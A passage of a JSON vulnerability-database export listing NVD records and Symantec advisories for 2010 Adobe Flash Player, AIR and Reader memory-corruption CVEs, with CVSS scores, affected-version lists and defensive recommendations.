9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3645"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3645", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on 
Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.", "edition": 5, "cvss3": {}, "published": "2010-10-29T19:00:00", "title": "CVE-2010-3654", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3654"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:8.0.24.0", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:acrobat:9.4", "cpe:/a:macromedia:flash_player:6.0.29.0", "cpe:/a:adobe:flash_player:7.0.70.0", 
"cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:macromedia:flash_player:6.0.79.0", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:flash_player:10.1.53.64", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:acrobat_reader:9.4", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:macromedia:flash_player:5.0", "cpe:/a:adobe:flash_player:10.1.85.3", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:10.1.92.8", "cpe:/a:adobe:flash_player:6.0.79", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:macromedia:flash_player:6.0.47.0", "cpe:/a:adobe:flash_player:10.1.52.15", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:macromedia:flash_player:6.0.65.0", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:6.0.21.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:macromedia:flash_player:5.0_r50", 
"cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:flash_player:10.1.52.14.1", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:flash_player:10.1.95.2", "cpe:/a:macromedia:flash_player:6.0", "cpe:/a:macromedia:flash_player:6.0.40.0", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2010-3654", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3654", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:5.0_r50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.79.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.40.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.15:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.85.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.53.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:macromedia:flash_player:6.0.65.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "An unspecified ActiveX control in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 (Flash10h.ocx) on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted FLV video.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3637", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3637"], "modified": "2019-10-09T23:01:00", "cpe": [], "id": "CVE-2010-3637", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3637", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3650", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3650"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3650", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:43", "description": "Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652.", "edition": 6, "cvss3": {}, "published": "2010-11-07T22:00:00", "title": "CVE-2010-3647", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3647"], "modified": "2019-10-09T23:01:00", "cpe": ["cpe:/a:adobe:flash_player:10.1.95.1"], "id": "CVE-2010-3647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3647", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-12T02:29:29", "bulletinFamily": "software", "cvelist": ["CVE-2010-3643"], "description": "### Description\n\nAdobe Flash Player is prone to a remote memory corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. 
NOTE: This issue was previously discussed in BID 44669 (Adobe Flash Player APSB10-26 Multiple Remote Vulnerabilities), but has been given its own record to better document it.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 
9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * HP Systems Insight Manager 6.0 \n * HP Systems Insight Manager 6.0.0.96 \n * HP Systems Insight Manager 6.1 \n * HP Systems Insight Manager 6.2 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal 
amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "SMNTC-44679", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44679", "type": "symantec", "title": "Adobe Flash Player CVE-2010-3643 Remote Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:43:15", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648"], "description": "### Description\n\nAdobe Flash Player is prone to a remote memory corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. 
NOTE: This issue was previously discussed in BID 44669 (Adobe Flash Player APSB10-26 Multiple Remote Vulnerabilities), but has been given its own record to better document it.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 
9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * HP Systems Insight Manager 6.0 \n * HP Systems Insight Manager 6.0.0.96 \n * HP Systems Insight Manager 6.1 \n * HP Systems Insight Manager 6.2 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal 
